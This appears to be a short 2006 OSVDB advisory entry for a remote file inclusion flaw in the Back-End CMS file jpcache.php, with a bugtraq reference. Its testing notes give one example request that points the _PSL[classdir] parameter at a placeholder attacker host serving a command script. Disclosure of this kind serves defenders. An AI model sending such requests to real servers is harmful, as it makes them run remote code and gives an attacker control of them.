Back-End jpcache.php _PSL[classdir] Variable Remote File Inclusion

2006-06-08T22:04:33
ID OSVDB:26639
Type osvdb
Reporter OSVDB
Modified 2006-06-08T22:04:33

Description

Manual Testing Notes

http://[target]/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://[attacker]/cmd.php?exec=uname

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0078.html